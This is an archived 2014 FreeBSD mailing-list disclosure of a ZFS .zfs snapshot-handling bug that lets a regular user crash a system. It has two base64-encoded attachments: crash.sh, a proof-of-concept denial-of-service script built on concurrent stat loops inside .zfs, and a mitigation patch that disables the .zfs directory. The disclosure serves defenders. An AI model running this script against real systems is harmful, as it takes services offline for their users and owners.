Date: Fri, 17 Jan 2014 03:11:44 +0100 (CET) From: Richard Kojedzinszky <krichy@cflinux.hu> To: freebsd-fs@freebsd.org Cc: freebsd-security@freebsd.org Subject: ZFS .zfs DoS Message-ID: <alpine.BSF.2.00.1401170304070.83798@pi.nmdps.net>
next in thread | raw e-mail | index | archive | help
This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. --2628712688-1861051549-1389924707=:83798 Content-Type: TEXT/PLAIN; format=flowed; charset=US-ASCII Dear users, For a long time now I've been investigating problems relating FreeBSD ZFS .zfs handling, and found that I am not enough to fix issues. Until fixes arrive, unfortunately a regular user can DoS a FreeBSD system which has ZFS filesystems with the attached script. While the script expects a snapshot argument to be given, actually the first test case does not need that, only a mounted zfs filesystem is enough. For more of the tests a snapshot may be needed, and later ones need root account also. I would recommend that until this gets rewritten or fixed at all, one should disable access to .zfs at all with someting like I've attached. Regards, Kojedzinszky Richard --2628712688-1861051549-1389924707=:83798 Content-Type: TEXT/PLAIN; charset=US-ASCII; name=crash.sh Content-Transfer-Encoding: BASE64 Content-ID: <alpine.BSF.2.00.1401170311440.83798@pi.nmdps.net> Content-Description: Content-Disposition: attachment; filename=crash.sh IyEvYmluL2Jhc2gNCg0Kc25hcHNob3Q9IiQxIg0KaWYgWyAteiAiJHNuYXBz aG90IiBdOyB0aGVuDQoJZWNobyAiRnJlZUJTRC9aRlMgc25hcHNob3QgaGFu ZGxpbmcgYnVnIg0KCWVjaG8gIiINCgllY2hvICJVc2FnZTogJDAgPHpmcyBz bmFwc2hvdD4iDQoJZXhpdCAxDQpmaQ0KDQpzbmFwc2hvdD0iJCh6ZnMgbGlz dCAtdCBzbmFwc2hvdCAtSCAtbyBuYW1lICIkc25hcHNob3QiKSINCmlmIFsg LXogIiRzbmFwc2hvdCIgXTsgdGhlbg0KCWVjaG8gIlNuYXBzaG90IG5vdCBm b3VuZCINCglleGl0IDINCmZpDQoNCmRhdGFzZXQ9IiR7c25hcHNob3QlQCp9 Ig0Kc249IiR7c25hcHNob3QjKkB9Ig0KbW91bnRwb2ludD0kKG1vdW50IHwg Z3JlcCAiXiRkYXRhc2V0W1s6c3BhY2U6XV0iIHwgYXdrICd7cHJpbnQgJDN9 JykNCg0KaWYgWyAhIC1kICIkbW91bnRwb2ludCIgXTsgdGhlbg0KCWVjaG8g IkNvdWxkIG5vdCBkZXRlcm1pbmUgbW91bnQgcG9pbnQgZm9yICRkYXRhc2V0 Ig0KCWV4aXQgMw0KZmkNCg0KZWNobyAiKiogZGF0YXNldD0kZGF0YXNldCBz bmFwbmFtZT0kc24gbW91bnRlZD0kbW91bnRwb2ludCINCg0KY2QgIiRtb3Vu dHBvaW50Ly56ZnMiDQp5ZXMgc25hcHNob3QgfCB4YXJncyBzdGF0ID4gL2Rl di9udWxsICYNCnllcyBzbmFwc2hvdCB8IHhhcmdzIHN0YXQgPiAvZGV2L251 bGwgJg0KDQojY2QgIiRtb3VudHBvaW50Ly56ZnMvc25hcHNob3QiDQojeWVz ICIkc24iIHwgeGFyZ3MgdW1vdW50ID4gL2Rldi9udWxsICYNCiN5ZXMgIiRz biIgfCB4YXJncyB1bW91bnQgPiAvZGV2L251bGwgJg0KI3llcyAiJG1vdW50 cG9pbnQvLnpmcy9zbmFwc2hvdC8kc24iIHwgeGFyZ3MgdW1vdW50ID4gL2Rl di9udWxsICYNCiN5ZXMgIiRtb3VudHBvaW50Ly56ZnMvc25hcHNob3QvJHNu IiB8IHhhcmdzIHVtb3VudCA+IC9kZXYvbnVsbCAmDQojeWVzICIkc24iIHwg eGFyZ3Mgc3RhdCA+IC9kZXYvbnVsbCAmDQojeWVzICIkc24iIHwgeGFyZ3Mg c3RhdCA+IC9kZXYvbnVsbCAmDQojeWVzICIkc24vLi4iIHwgeGFyZ3Mgc3Rh dCA+IC9kZXYvbnVsbCAmDQojeWVzICIkc24vLi4iIHwgeGFyZ3Mgc3RhdCA+ IC9kZXYvbnVsbCAmDQojeWVzICIuIiB8IHhhcmdzIGxzIC1sYSA+IC9kZXYv bnVsbCAmDQojeWVzICIuIiB8IHhhcmdzIGxzIC1sYSA+IC9kZXYvbnVsbCAm DQoNCiN5ZXMgIiRzbmFwc2hvdCIgfCB4YXJncyAtbiAxIHpmcyBzZW5kIC1S ID4gL2Rldi9udWxsICYNCg== --2628712688-1861051549-1389924707=:83798 Content-Type: TEXT/PLAIN; charset=US-ASCII; name=no_dot_zfs_at_all.patch Content-Transfer-Encoding: BASE64 Content-ID: <alpine.BSF.2.00.1401170311441.83798@pi.nmdps.net> Content-Description: Content-Disposition: attachment; filename=no_dot_zfs_at_all.patch ZGlmZiAtLWdpdCBhL3N5cy9jZGRsL2NvbnRyaWIvb3BlbnNvbGFyaXMvdXRz L2NvbW1vbi9mcy96ZnMvemZzX3Zmc29wcy5jIGIvc3lzL2NkZGwvY29udHJp Yi9vcGVuc29sYXJpcy91dHMvY29tbW9uL2ZzL3pmcy96ZnNfdmZzb3BzLmMN CmluZGV4IDhlYjg5NTMuLjI3ZjQyYmQgMTAwNjQ0DQotLS0gYS9zeXMvY2Rk bC9jb250cmliL29wZW5zb2xhcmlzL3V0cy9jb21tb24vZnMvemZzL3pmc192 ZnNvcHMuYw0KKysrIGIvc3lzL2NkZGwvY29udHJpYi9vcGVuc29sYXJpcy91 dHMvY29tbW9uL2ZzL3pmcy96ZnNfdmZzb3BzLmMNCkBAIC0xMjI3LDggKzEy MjcsMTAgQEAgemZzX2RvbW91bnQodmZzX3QgKnZmc3AsIGNoYXIgKm9zbmFt ZSkNCiAJVkVSSUZZKFZGU19ST09UKHZmc3AsIExLX0VYQ0xVU0lWRSwgJnZw KSA9PSAwKTsNCiAJVk9QX1VOTE9DSyh2cCwgMCk7DQogDQorI2lmIDANCiAJ aWYgKCF6ZnN2ZnMtPnpfaXNzbmFwKQ0KIAkJemZzY3RsX2NyZWF0ZSh6ZnN2 ZnMpOw0KKyNlbmRpZg0KIG91dDoNCiAJaWYgKGVycm9yKSB7DQogCQlkbXVf b2Jqc2V0X2Rpc293bih6ZnN2ZnMtPnpfb3MsIHpmc3Zmcyk7DQpAQCAtMTk2 MCw4ICsxOTYyLDEwIEBAIHpmc191bW91bnQodmZzX3QgKnZmc3AsIGludCBm ZmxhZykNCiAJCQkJcmV0dXJuIChFQlVTWSk7DQogCQkJQVNTRVJUKHpmc3Zm cy0+el9jdGxkaXItPnZfY291bnQgPT0gMSk7DQogCQl9DQorI2lmIDANCiAJ CXpmc2N0bF9kZXN0cm95KHpmc3Zmcyk7DQogCQlBU1NFUlQoemZzdmZzLT56 X2N0bGRpciA9PSBOVUxMKTsNCisjZW5kaWYNCiAJfQ0KIA0KIAlpZiAoZmZs YWcgJiBNU19GT1JDRSkgew0KQEAgLTE5ODAsMTAgKzE5ODQsMTIgQEAgemZz X3Vtb3VudCh2ZnNfdCAqdmZzcCwgaW50IGZmbGFnKQ0KIAkgKi8NCiAJcmV0 ID0gdmZsdXNoKHZmc3AsIDEsIChmZmxhZyAmIE1TX0ZPUkNFKSA/IEZPUkNF Q0xPU0UgOiAwLCB0ZCk7DQogCWlmIChyZXQgIT0gMCkgew0KKyNpZiAwDQog CQlpZiAoIXpmc3Zmcy0+el9pc3NuYXApIHsNCiAJCQl6ZnNjdGxfY3JlYXRl KHpmc3Zmcyk7DQogCQkJQVNTRVJUKHpmc3Zmcy0+el9jdGxkaXIgIT0gTlVM TCk7DQogCQl9DQorI2VuZGlmDQogCQlyZXR1cm4gKHJldCk7DQogCX0NCiAN CkBAIC0yMDM0LDggKzIwNDAsMTAgQEAgemZzX3Vtb3VudCh2ZnNfdCAqdmZz cCwgaW50IGZmbGFnKQ0KIAkvKg0KIAkgKiBXZSBjYW4gbm93IHNhZmVseSBk ZXN0cm95IHRoZSAnLnpmcycgZGlyZWN0b3J5IG5vZGUuDQogCSAqLw0KKyNp ZiAwDQogCWlmICh6ZnN2ZnMtPnpfY3RsZGlyICE9IE5VTEwpDQogCQl6ZnNj dGxfZGVzdHJveSh6ZnN2ZnMpOw0KKyNlbmRpZg0KIAlpZiAoemZzdmZzLT56 X2lzc25hcCkgew0KIAkJdm5vZGVfdCAqc3ZwID0gdmZzcC0+bW50X3Zub2Rl Y292ZXJlZDsNCiANCg== --2628712688-1861051549-1389924707=:83798--
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?alpine.BSF.2.00.1401170304070.83798>